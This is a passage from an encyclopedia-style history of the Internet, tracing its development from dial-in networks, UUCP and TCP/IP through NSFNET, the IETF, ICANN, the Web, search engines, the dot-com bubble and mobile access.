The first public dial-in networks used asynchronous TTY terminal protocols to reach a concentrator operated in the public network. Some networks, such as CompuServe, used X.25 to multiplex the terminal sessions into their packet-switched backbones, while others, such as Tymnet, used proprietary protocols. In 1979, CompuServe became the first service to offer electronic mail capabilities and technical support to personal computer users. The company broke new ground again in 1980 as the first to offer real-time chat with its CB Simulator. Other major dial-in networks were America Online (AOL) and Prodigy that also provided communications, content, and entertainment features. Many bulletin board system (BBS) networks also provided on-line access, such as FidoNet which was popular amongst hobbyist computer users, many of them hackers and amateur radio operators.[citation needed]

UUCP and Usenet

In 1979, two students at Duke University, Tom Truscott and Jim Ellis, came up with the idea of using simple Bourne shell scripts to transfer news and messages on a serial line UUCP connection with nearby University of North Carolina at Chapel Hill. Following public release of the software, the mesh of UUCP hosts forwarding on the Usenet news rapidly expanded. UUCPnet, as it would later be named, also created gateways and links between FidoNet and dial-up BBS hosts. UUCP networks spread quickly due to the lower costs involved, ability to use existing leased lines, X.25 links or even ARPANET connections, and the lack of strict use policies (commercial organizations who might provide bug fixes) compared to later networks like CSnet and Bitnet. All connects were local. By 1981 the number of UUCP hosts had grown to 550, nearly doubling to 940 in 1984. – Sublink Network, operating since 1987 and officially founded in Italy in 1989, based its interconnectivity upon UUCP to redistribute mail and news groups messages throughout its Italian nodes (about 100 at the time) owned both by private individuals and small companies. Sublink Network represented possibly one of the first examples of the internet technology becoming progress through popular diffusion.[23]

Merging the networks and creating the Internet (1973–90)

TCP/IP


Map of the TCP/IP test network in February 1982
With so many different network methods, something was needed to unify them. Robert E. Kahn of DARPA and ARPANET recruited Vinton Cerf of Stanford University to work with him on the problem. By 1973, they had worked out a fundamental reformulation, where the differences between network protocols were hidden by using a common internetwork protocol, and instead of the network being responsible for reliability, as in the ARPANET, the hosts became responsible. Cerf credits Hubert Zimmerman, Gerard LeLann and Louis Pouzin (designer of the CYCLADES network) with important work on this design.[24]
The specification of the resulting protocol, RFC 675 – Specification of Internet Transmission Control Program, by Vinton Cerf, Yogen Dalal and Carl Sunshine, Network Working Group, December 1974, contains the first attested use of the term internet, as a shorthand for internetworking; later RFCs repeat this use, so the word started out as an adjective rather than the noun it is today.

A Stanford Research Institute packet radio van, site of the first three-way internetworked transmission.
With the role of the network reduced to the bare minimum, it became possible to join almost any networks together, no matter what their characteristics were, thereby solving Kahn's initial problem. DARPA agreed to fund development of prototype software, and after several years of work, the first demonstration of a gateway between the Packet Radio network in the SF Bay area and the ARPANET was conducted by the Stanford Research Institute. On November 22, 1977 a three network demonstration was conducted including the ARPANET, the Packet Radio Network and the Atlantic Packet Satellite network.[25][26]
Stemming from the first specifications of TCP in 1974, TCP/IP emerged in mid-late 1978 in nearly final form. By 1981, the associated standards were published as RFCs 791, 792 and 793 and adopted for use. DARPA sponsored or encouraged the development of TCP/IP implementations for many operating systems and then scheduled a migration of all hosts on all of its packet networks to TCP/IP. On January 1, 1983, known as flag day, TCP/IP protocols became the only approved protocol on the ARPANET, replacing the earlier NCP protocol.[27]

ARPANET to the federal wide area networks: MILNET, NSI, ESNet, CSNET, and NSFNET


BBN Technologies TCP/IP internet map early 1986
After the ARPANET had been up and running for several years, ARPA looked for another agency to hand off the network to; ARPA's primary mission was funding cutting edge research and development, not running a communications utility. Eventually, in July 1975, the network had been turned over to the Defense Communications Agency, also part of the Department of Defense. In 1983, the U.S. military portion of the ARPANET was broken off as a separate network, the MILNET. MILNET subsequently became the unclassified but military-only NIPRNET, in parallel with the SECRET-level SIPRNET and JWICS for TOP SECRET and above. NIPRNET does have controlled security gateways to the public Internet.
The networks based on the ARPANET were government funded and therefore restricted to noncommercial uses such as research; unrelated commercial use was strictly forbidden. This initially restricted connections to military sites and universities. During the 1980s, the connections expanded to more educational institutions, and even to a growing number of companies such as Digital Equipment Corporation and Hewlett-Packard, which were participating in research projects or providing services to those who were.
Several other branches of the U.S. government, the National Aeronautics and Space Agency (NASA), the National Science Foundation (NSF), and the Department of Energy (DOE) became heavily involved in Internet research and started development of a successor to ARPANET. In the mid 1980s, all three of these branches developed the first Wide Area Networks based on TCP/IP. NASA developed the NASA Science Network, NSF developed CSNET and DOE evolved the Energy Sciences Network or ESNet.

T3 NSFNET Backbone, c. 1992
NASA developed the TCP/IP based NASA Science Network (NSN) in the mid 1980s, connecting space scientists to data and information stored anywhere in the world. In 1989, the DECnet-based Space Physics Analysis Network (SPAN) and the TCP/IP-based NASA Science Network (NSN) were brought together at NASA Ames Research Center creating the first multiprotocol wide area network called the NASA Science Internet, or NSI. NSI was established to provide a totally integrated communications infrastructure to the NASA scientific community for the advancement of earth, space and life sciences. As a high-speed, multiprotocol, international network, NSI provided connectivity to over 20,000 scientists across all seven continents.

In 1981 NSF supported the development of the Computer Science Network (CSNET). CSNET connected with ARPANET using TCP/IP, and ran TCP/IP over X.25, but it also supported departments without sophisticated network connections, using automated dial-up mail exchange. Its experience with CSNET lead NSF to use TCP/IP when it created NSFNET, a 56 kbit/s backbone established in 1986, that connected the NSF supported supercomputing centers and regional research and education networks in the United States.[28] However, use of NSFNET was not limited to supercomputer users and the 56 kbit/s network quickly became overloaded. NSFNET was upgraded to 1.5 Mbit/s in 1988. The existence of NSFNET and the creation of Federal Internet Exchanges (FIXes) allowed the ARPANET to be decommissioned in 1990. NSFNET was expanded and upgraded to 45 Mbit/s in 1991, and was decommissioned in 1995 when it was replaced by backbones operated by several commercial Internet Service Providers.

Transition towards the Internet

The term "internet" was adopted in the first RFC published on the TCP protocol (RFC 675:[29] Internet Transmission Control Program, December 1974) as an abbreviation of the term internetworking and the two terms were used interchangeably. In general, an internet was any network using TCP/IP. It was around the time when ARPANET was interlinked with NSFNET in the late 1980s, that the term was used as the name of the network, Internet,[30] being a large and global TCP/IP network.
As interest in widespread networking grew and new applications for it were developed, the Internet's technologies spread throughout the rest of the world. The network-agnostic approach in TCP/IP meant that it was easy to use any existing network infrastructure, such as the IPSS X.25 network, to carry Internet traffic. In 1984, University College London replaced its transatlantic satellite links with TCP/IP over IPSS.[31]
Many sites unable to link directly to the Internet started to create simple gateways to allow transfer of e-mail, at that time the most important application. Sites which only had intermittent connections used UUCP or FidoNet and relied on the gateways between these networks and the Internet. Some gateway services went beyond simple email peering, such as allowing access to FTP sites via UUCP or e-mail.
Finally, the Internet's remaining centralized routing aspects were removed. The EGP routing protocol was replaced by a new protocol, the Border Gateway Protocol (BGP). This turned the Internet into a meshed topology and moved away from the centric architecture which ARPANET had emphasized. In 1994, Classless Inter-Domain Routing was introduced to support better conservation of address space which allowed use of route aggregation to decrease the size of routing tables.[32]

TCP/IP goes global (1989–2000)

CERN, the European Internet, the link to the Pacific and beyond

Between 1984 and 1988 CERN began installation and operation of TCP/IP to interconnect its major internal computer systems, workstations, PCs and an accelerator control system. CERN continued to operate a limited self-developed system CERNET internally and several incompatible (typically proprietary) network protocols externally. There was considerable resistance in Europe towards more widespread use of TCP/IP and the CERN TCP/IP intranets remained isolated from the Internet until 1989.
In 1988 Daniel Karrenberg, from Centrum Wiskunde & Informatica (CWI) in Amsterdam, visited Ben Segal, CERN's TCP/IP Coordinator, looking for advice about the transition of the European side of the UUCP Usenet network (much of which ran over X.25 links) over to TCP/IP. In 1987, Ben Segal had met with Len Bosack from the then still small company Cisco about purchasing some TCP/IP routers for CERN, and was able to give Karrenberg advice and forward him on to Cisco for the appropriate hardware. This expanded the European portion of the Internet across the existing UUCP networks, and in 1989 CERN opened its first external TCP/IP connections.[33] This coincided with the creation of Réseaux IP Européens (RIPE), initially a group of IP network administrators who met regularly to carry out co-ordination work together. Later, in 1992, RIPE was formally registered as a cooperative in Amsterdam.
At the same time as the rise of internetworking in Europe, ad hoc networking to ARPA and in-between Australian universities formed, based on various technologies such as X.25 and UUCPNet. These were limited in their connection to the global networks, due to the cost of making individual international UUCP dial-up or X.25 connections. In 1989, Australian universities joined the push towards using IP protocols to unify their networking infrastructures. AARNet was formed in 1989 by the Australian Vice-Chancellors' Committee and provided a dedicated IP based network for Australia.
The Internet began to penetrate Asia in the late 1980s. Japan, which had built the UUCP-based network JUNET in 1984, connected to NSFNET in 1989. It hosted the annual meeting of the Internet Society, INET'92, in Kobe. Singapore developed TECHNET in 1990, and Thailand gained a global Internet connection between Chulalongkorn University and UUNET in 1992.[34]

Global digital divide

While developed countries with technological infrastructures were joining the Internet, developing countries began to experience a digital divide separating them from the Internet. On an essentially continental basis, they are building organizations for Internet resource administration and sharing operational experience, as more and more transmission facilities go into place.

Africa

At the beginning of the 1990s, African countries relied upon X.25 IPSS and 2400 baud modem UUCP links for international and internetwork computer communications.
In August 1995, InfoMail Uganda, Ltd., a privately held firm in Kampala now known as InfoCom, and NSN Network Services of Avon, Colorado, sold in 1997 and now known as Clear Channel Satellite, established Africa's first native TCP/IP high-speed satellite Internet services. The data connection was originally carried by a C-Band RSCC Russian satellite which connected InfoMail's Kampala offices directly to NSN's MAE-West point of presence using a private network from NSN's leased ground station in New Jersey. InfoCom's first satellite connection was just 64 kbit/s, serving a Sun host computer and twelve US Robotics dial-up modems.
In 1996 a USAID funded project, the Leland initiative, started work on developing full Internet connectivity for the continent. Guinea, Mozambique, Madagascar and Rwanda gained satellite earth stations in 1997, followed by Côte d'Ivoire and Benin in 1998.
Africa is building an Internet infrastructure. AfriNIC, headquartered in Mauritius, manages IP address allocation for the continent. As do the other Internet regions, there is an operational forum, the Internet Community of Operational Networking Specialists.[3

There are a wide range of programs both to provide high-performance transmission plant, and the western and southern coasts have undersea optical cable. High-speed cables join North Africa and the Horn of Africa to intercontinental cable systems. Undersea cable development is slower for East Africa; the original joint effort between New Partnership for Africa's Development (NEPAD) and the East Africa Submarine System (Eassy) has broken off and may become two efforts.[36]

Asia and Oceania

The Asia Pacific Network Information Centre (APNIC), headquartered in Australia, manages IP address allocation for the continent. APNIC sponsors an operational forum, the Asia-Pacific Regional Internet Conference on Operational Technologies (APRICOT).[37]
In 1991, the People's Republic of China saw its first TCP/IP college network, Tsinghua University's TUNET. The PRC went on to make its first global Internet connection in 1994, between the Beijing Electro-Spectrometer Collaboration and Stanford University's Linear Accelerator Center. However, China went on to implement its own digital divide by implementing a country-wide content filter.[38]

Latin America

As with the other regions, the Latin American and Caribbean Internet Addresses Registry (LACNIC) manages the IP address space and other resources for its area. LACNIC, headquartered in Uruguay, operates DNS root, reverse DNS, and other key services.

Opening the network to commerce

The interest in commercial use of the Internet became a hotly debated topic. Although commercial use was forbidden, the exact definition of commercial use could be unclear and subjective. UUCPNet and the X.25 IPSS had no such restrictions, which would eventually see the official barring of UUCPNet use of ARPANET and NSFNET connections. Some UUCP links still remained connecting to these networks however, as administrators cast a blind eye to their operation.
World Internet Hosts: 1981–2011
During the late 1980s, the first Internet service provider (ISP) companies were formed. Companies like PSINet, UUNET, Netcom, and Portal Software were formed to provide service to the regional research networks and provide alternate network access, UUCP-based email and Usenet News to the public. The first commercial dialup ISP in the United States was The World, opened in 1989.[39]
In 1992, Congress passed the Scientific and Advanced-Technology Act, 42 U.S.C. § 1862(g), which allowed NSF to support access by the research and education communities to computer networks which were not used exclusively for research and education purposes, thus permitting NSFNET to interconnect with commercial networks.[40][41] This caused controversy within the research and education community, who were concerned commercial use of the network might lead to an Internet that was less responsive to their needs, and within the community of commercial network providers, who felt that government subsidies were giving an unfair advantage to some organizations.[42]
By 1990, ARPANET had been overtaken and replaced by newer networking technologies and the project came to a close. New network service providers including PSINet, Alternet, CERFNet, ANS CO+RE, and many others were offering network access to commercial customers. NSFNET was no longer the de facto backbone and exchange point for Internet. The Commercial Internet eXchange (CIX), Metropolitan Area Exchanges (MAEs), and later Network Access Points (NAPs) were becoming the primary interconnections between many networks. The final restrictions on carrying commercial traffic ended on April 30, 1995 when the National Science Foundation ended its sponsorship of the NSFNET Backbone Service and the service ended.[43][44] NSF provided initial support for the NAPs and interim support to help the regional research and education networks transition to commercial ISPs. NSF also sponsored the very high speed Backbone Network Service (vBNS) which continued to provide support for the supercomputing centers and research and education in the United States.[45]

Internet Engineering Task Force

The Internet Engineering Task Force (IETF) is a loosely self-organized group of volunteers who contribute to the engineering and evolution of Internet technologies. It is the principal body engaged in the development of new Internet standard specifications. Much of the IETF's work is done in Working Groups. It does not "run the Internet", despite what some people might mistakenly say. The IETF does make standards that are often adopted by Internet users, but it does not control, or even patrol, the Internet.[46][47]
The IETF started in January 1986 as a quarterly meeting of U.S. government funded researchers. Non-government representatives were invited starting with the fourth IETF meeting in October 1986. The concept of Working Groups was introduced at the fifth IETF meeting in February 1987. The seventh IETF meeting in July 1987 was the first meeting with more than 100 attendees. In 1992, the Internet Society, a professional membership society, was formed and IETF began to operate under it as an independent international standards body. The first IETF meeting outside of the United States was held in Amsterdam, The Netherlands, in July 1993. Today the IETF meets three times a year and attendnce is often about 1,300 people, but has been as high as 2,000 upon occasion. Typically one in three IETF meetings are held in Europe or Asia. The number of non-US attendees is roughly 50%, even at meetings held in the United States.[46]
The IETF is unusual in that it exists as a collection of happenings, but is not a corporation and has no board of directors, no members, and no dues. The closest thing there is to being an IETF member is being on the IETF or a Working Group mailing list. IETF volunteers come from all over the world and from many different parts of the Internet community. The IETF works closely with and under the supervision of the Internet Engineering Steering Group (IESG)[48] and the Internet Architecture Board (IAB).[49] The Internet Research Task Force (IRTF) and the Internet Research Steering Group (IRSG), peer activities to the IETF and IESG under the general supervision of the IAB, focus on longer term research issues.[50][46]

Request for Comments

Request for Comments (RFCs) are the main documentation for the work of the IAB, IESG, IETF, and IRTF. RFC 1, "Host Software", was written by Steve Crocker at UCLA in April 1969, well before the IETF was created. Originally they were technical memos documenting aspects of ARPANET development and were edited by the late Jon Postel, the first RFC Editor.[46][51]
RFCs cover a wide range of information from proposed standards, draft standards, full standards, best practices, experimental protocols, history, and other informational topics.[52] RFCs can be written by individuals or informal groups of individuals, but many are the product of a more formal Working Group. Drafts are submitted to the IESG either by individuals or by the Working Group Chair. An RFC Editor, appointed by the IAB, separate from IANA, and working in conjunction with the IESG, receives drafts from the IESG and edits, formats, and publishes them. Once an RFC is published, it is never revised. If the standard it describes changes or its information becomes obsolete, the revised standard or updated information will be re-published as a new RFC that "obsoletes" the original.[46][51]

NIC, InterNIC, IANA and ICANN

The first central authority to coordinate the operation of the network was the Network Information Centre (NIC) at Stanford Research Institute (SRI) in Menlo Park, California. In 1972, management of these issues was given to the newly created Internet Assigned Numbers Authority (IANA). In addition to his role as the RFC Editor, Jon Postel worked as the manager of IANA until his death in 1998.
As the early ARPANET grew, hosts were referred to by names, and a HOSTS.TXT file would be distributed from SRI International to each host on the network. As the network grew, this became cumbersome. A technical solution came in the form of the Domain Name System, created by Paul Mockapetris. The Defense Data Network—Network Information Center (DDN-NIC) at SRI handled all registration services, including the top-level domains (TLDs) of .mil, .gov, .edu, .org, .net, .com and .us, root nameserver administration and Internet number assignments under a United States Department of Defense contract.[53] In 1991, the Defense Information Systems Agency (DISA) awarded the administration and maintenance of DDN-NIC (managed by SRI up until this point) to Government Systems, Inc., who subcontracted it to the small private-sector Network Solutions, Inc.[54][55]
Since at this point in history most of the growth on the Internet was coming from non-military sources, it was decided that the Department of Defense would no longer fund registration services outside of the .mil TLD. In 1993 the U.S. National Science Foundation, after a competitive bidding process in 1992, created the InterNIC to manage the allocations of addresses and management of the address databases, and awarded the contract to three organizations. Registration Services would be provided by Network Solutions; Directory and Database Services would be provided by AT&T; and Information Services would be provided by

General Atomics.[56]
In 1998 both IANA and InterNIC were reorganized under the control of ICANN, a California non-profit corporation contracted by the United States Department of Commerce to manage a number of Internet-related tasks. The role of operating the DNS system was privatized and opened up to competition, while the central management of name allocations would be awarded on a contract tender basis.

Globalization and the 21st century

Since the 1990s, the Internet's governance and organization has been of global importance to commerce. The organizations which hold control of certain technical aspects of the Internet are both the successors of the old ARPANET oversight and the current decision-makers in the day-to-day technical aspects of the network. While formally recognized as the administrators of the network, their roles and their decisions are subject to international scrutiny and objections which limit them. These objections have led to the ICANN removing themselves from relationships with first the University of Southern California in 2000,[57] and finally in September 2009, gaining autonomy from the US government by the ending of its longstanding agreements, although some contractual obligations with the Department of Commerce continue until at least 2011.[58][59][60] The history of the Internet will now be played out in many ways as a consequence of the ICANN organization.
In the role of forming standard associated with the Internet, the IETF continues to serve as the ad-hoc standards group. They continue to issue Request for Comments numbered sequentially from RFC 1 under the ARPANET project, for example, and the IETF precursor was the GADS Task Force which was a group of US government-funded researchers in the 1980s. Many of the group's recent developments have been of global necessity, such as the i18n working groups who develop things like internationalized domain names. The Internet Society has helped to fund the IETF, providing limited oversight.

Futurology: Beyond Earth and TCP/IP (2010 to present)

The first live Internet link into low earth orbit was established on January 22, 2010 when astronaut T. J. Creamer posted the first unassisted update to his Twitter account from the International Space Station, marking the extension of the Internet into space. (Astronauts at the ISS had used email and Twitter before, but these messages had been relayed to the ground through a NASA data link before being posted by a human proxy.) This personal Web access, which NASA calls the Crew Support LAN, uses the space station's high-speed Ku band microwave link. To surf the Web, astronauts can use a station laptop computer to control a desktop computer on Earth, and they can talk to their families and friends on Earth using Voice over IP equipment.[61]
Communication with spacecraft beyond earth orbit has traditionally been over point-to-point links through the Deep Space Network. Each such data link must be manually scheduled and configured. In the late 1990s NASA and Google began working on a new network protocol, Delay-tolerant networking (DTN) which automates this process, allows networking of spaceborn transmission nodes, and takes the fact into account that spacecraft can temporarily lose contact because they move behind the Moon or planets, or because space "weather" disrupts the connection. Under such conditions, DTN retransmits data packages instead of dropping them, as the standard TCP/IP internet protocol does. NASA conducted the first field test of what it calls the "deep space internet" in November 2008.[62] This network technology is supposed to enable missions that involve multiple spacecraft where reliable inter-vessel communication might take precedence over vessel-to-earth downlinks.

Use and culture

E-mail and Usenet

E-mail is often called the killer application of the Internet. However, it actually predates the Internet and was a crucial tool in creating it. Email started in 1965 as a way for multiple users of a time-sharing mainframe computer to communicate. Although the history is unclear, among the first systems to have such a facility were SDC's Q32 and MIT's CTSS.[63]
The ARPANET computer network made a large contribution to the evolution of e-mail. There is one report[64] indicating experimental inter-system e-mail transfers on it shortly after ARPANET's creation. In 1971 Ray Tomlinson created what was to become the standard Internet e-mail address format, using the @ sign to separate user names from host names.[65]
A number of protocols were developed to deliver e-mail among groups of time-sharing computers over alternative transmission systems, such as UUCP and IBM's VNET e-mail system. E-mail could be passed this way between a number of networks, including ARPANET, BITNET and NSFNET, as well as to hosts connected directly to other sites via UUCP. See the history of SMTP protocol.
In addition, UUCP allowed the publication of text files that could be read by many others. The News software developed by Steve Daniel and Tom Truscott in 1979 was used to distribute news and bulletin board-like messages. This quickly grew into discussion groups, known as newsgroups, on a wide range of topics. On ARPANET and NSFNET similar discussion groups would form via mailing lists, discussing both technical issues and more culturally focused topics (such as science fiction, discussed on the sflovers mailing list).
During the early years of the Internet, e-mail and similar mechanisms were also fundamental to allow people to access resources that were not available due to the absence of online connectivity. UUCP was often used to distribute files using the 'alt.binary' groups. Also, FTP e-mail gateways allowed people that lived outside the US and Europe to download files using ftp commands written inside e-email messages. The file was encoded, broken in pieces and sent by e-mail; the receiver had to reassemble and decode it later, and it was the only way for people living overseas to download items such as the earlier Linux versions using the slow dial-up connections available at the time. After the popularization of the Web and the HTTP protocol such tools were slowly abandoned.

From gopher to the WWW

As the Internet grew through the 1980s and early 1990s, many people realized the increasing need to be able to find and organize files and information. Projects such as Gopher, WAIS, and the FTP Archive list attempted to create ways to organize distributed data. Unfortunately, these projects fell short in being able to accommodate all the existing data types and in being able to grow without bottlenecks.[citation needed]
One of the most promising user interface paradigms during this period was hypertext. The technology had been inspired by Vannevar Bush's "Memex"[66] and developed through Ted Nelson's research on Project Xanadu and Douglas Engelbart's research on NLS.[67] Many small self-contained hypertext systems had been created before, such as Apple Computer's HyperCard (1987). Gopher became the first commonly-used hypertext interface to the Internet. While Gopher menu items were examples of hypertext, they were not commonly perceived in that way.

This NeXT Computer was used by Sir Tim Berners-Lee at CERN and became the world's first Web server.
In 1989, while working at CERN, Tim Berners-Lee invented a network-based implementation of the hypertext concept. By releasing his invention to public use, he ensured the technology would become widespread.[68] For his work in developing the World Wide Web, Berners-Lee received the Millennium technology prize in 2004.[69] One early popular web browser, modeled after HyperCard, was ViolaWWW.
A potential turning point for the World Wide Web began with the introduction[70] of the Mosaic web browser[71] in 1993, a graphical browser developed by a team at the National Center for Supercomputing Applications at the University of Illinois at Urbana-Champaign (NCSA-UIUC), led by Marc Andreessen. Funding for Mosaic came from the High-Performance Computing and Communications Initiative, a funding program initiated by the High Performance Computing and Communication Act of 1991 also known as the Gore Bill.[72] Indeed, Mosaic's graphical interface soon became more popular than Gopher, which at the time was primarily text-based, and the WWW became the preferred interface for accessing the Internet. (Gore's reference to his role in "creating the Internet", however, was ridiculed in his presidential election campaign. See the full article Al Gore and information technology).
Mosaic was eventually superseded in 1994 by Andreessen's Netscape Navigator, which replaced Mosaic as the world's most popular browser. While it held this title for some time, eventually competition from Internet Explorer and a variety of other browsers almost completely displaced it. Another important event held on January 11, 1994, was The Superhighway Summit at UCLA's Royce Hall. This was the "first public conference bringing together all of the major industry, government and academic leaders in the field [and] also began the national dialogue about the Information Superhighway and its implications."[73]
24 Hours in Cyberspace, "the largest one-day online event" (February 8, 1996) up to that date, took place on the then-active website, cyber24.com.[74][75] It was headed by photographer Rick Smolan.[76] A photographic exhibition was unveiled at the Smithsonian Institution's National Museum of American History on January 23, 1997, featuring 70 photos from the project.[77]

Search engines

Even before the World Wide Web, there were search engines that attempted to organize the Internet. The first of these was the Archie search engine from McGill University in 1990, followed in 1991 by WAIS and Gopher. All three of those systems predated the invention of the World Wide Web but all continued to index the Web and the rest of the Internet for several years after the Web appeared. There are still Gopher servers as of 2006, although there are a great many more web servers.
As the Web grew, search engines and Web directories were created to track pages on the Web and allow people to find things. The first full-text Web search engine was WebCrawler in 1994. Before WebCrawler, only Web page titles were searched. Another early search engine, Lycos, was created in 1993 as a university project, and was the first to achieve commercial success. During the late 1990s, both Web directories and Web search engines were popular—Yahoo! (founded 1994) and Altavista (founded 1995) were the respective industry leaders. By August 2001, the directory model had begun to give way to search engines, tracking the rise of Google (founded 1998), which had developed new approaches to relevancy ranking. Directory features, while still commonly available, became after-thoughts to search engines.
Database size, which had been a significant marketing feature through the early 2000s, was similarly displaced by emphasis on relevancy ranking, the methods by which search engines attempt to sort the best results first. Relevancy ranking first became a major issue circa 1996, when it became apparent that it was impractical to review full lists of results. Consequently, algorithms for relevancy ranking have continuously improved. Google's PageRank method for ordering the results has received the most press, but all major search engines continually refine their ranking methodologies with a view toward improving the ordering of results. As of 2006, search engine rankings are more important than ever, so much so that an industry has developed ("search engine optimizers", or "SEO") to help web-developers improve their search ranking, and an entire body of case law has developed around matters that affect search engine rankings, such as use of trademarks in metatags. The sale of search rankings by some search engines has also created controversy among librarians and consumer advocates.[78]
On June 3, 2009, Microsoft launched its new search engine, Bing.[79] The following month Microsoft and Yahoo! announced a deal in which Bing would power Yahoo! Search.[80]

Dot-com bubble

Suddenly the low price of reaching millions worldwide, and the possibility of selling to or hearing from those people at the same moment when they were reached, promised to overturn established business dogma in advertising, mail-order sales, customer relationship management, and many more areas. The web was a new killer app—it could bring together unrelated buyers and sellers in seamless and low-cost ways. Visionaries around the world developed new business models, and ran to their nearest venture capitalist. While some of the new entrepreneurs had experience in business and economics, the majority were simply people with ideas, and did not manage the capital influx prudently. Additionally, many dot-com business plans were predicated on the assumption that by using the Internet, they would bypass the distribution channels of existing businesses and therefore not have to compete with them; when the established businesses with strong existing brands developed their own Internet presence, these hopes were shattered, and the newcomers were left attempting to break into markets dominated by larger, more established businesses. Many did not have the ability to do so.
The dot-com bubble burst in March 2000, with the technology heavy NASDAQ Composite index peaking at 5,048.62 on March 10[81] (5,132.52 intraday), more than double its value just a year before. By 2001, the bubble's deflation was running full speed. A majority of the dot-coms had ceased trading, after having burnt through their venture capital and IPO capital, often without ever making a profit. But despite this, the Internet continues to grow, driven by commerce, ever greater amounts of online information and knowledge and social networking.

Online population forecast

A study conducted by JupiterResearch anticipates that a 38 percent increase in the number of people with online access will mean that, by 2011, 22 percent of the Earth's population will surf the Internet regularly. The report says 1.1 billion people have regular Web access. For the study, JupiterResearch defined online users as people who regularly access the Internet from dedicated Internet-access devices, which exclude cellular telephones.[82]

Mobile phones and the Internet

The first mobile phone with Internet connectivity was the Nokia 9000 Communicator, launched in Finland in 1996. The viability of Internet services access on mobile phones was limited until prices came down from that model and network providers started to develop systems and services conveniently accessible on phones. NTT DoCoMo in Japan launched the first mobile Internet service, i-mode, in 1999 and this is considered the birth of the mobile phone Internet services. In 2001 the mobile phone email system by Research in Motion for their BlackBerry product was launched in America. To make efficient use of the small screen and tiny keypad and one-handed operation typical of mobile phones, a specific document and networking model was created for mobile devices, the Wireless Application Protocol (WAP). Most mobile device Internet services operate using WAP. The growth of mobile phone services was initially a primarily Asian phenomenon with Japan, South Korea and Taiwan all soon finding the majority of their Internet users accessing resources by phone rather than by PC.[citation needed] Developing countries followed, with India, South Africa, Kenya, Philippines, and Pakistan all reporting that the majority of their domestic users accessed the Internet from a mobile phone rather than a PC. The European and North American use of the Internet was influenced by a large installed base of personal computers, and the growth of mobile phone Internet access was more gradual, but had reached national penetration levels of 20–30% in most Western countries.[citation needed] The cross-over occurred in 2008, when more Internet access devices were mobile phones than personal computers. In many parts of the developing world, the ratio is as much as 10 mobile phone users to one PC user.[83]

Historiography

Some concerns have been raised over the historiography of the Internet's development. Specifically that it is hard to find documentation of much of the Internet's development, for several reasons, including a lack of centralized documentation for much of the early developments that led to the Internet.
"The Arpanet period is somewhat well documented because the corporation in charge – BBN – left a physical record. Moving into the NSFNET era, it became an extraordinarily decentralized process. The record exists in people's basements, in closets. [...] So much of what happened was done verbally and on the basis of individual trust."
Doug Gale (2007), [84]
Tim Berners-Lee, August 1996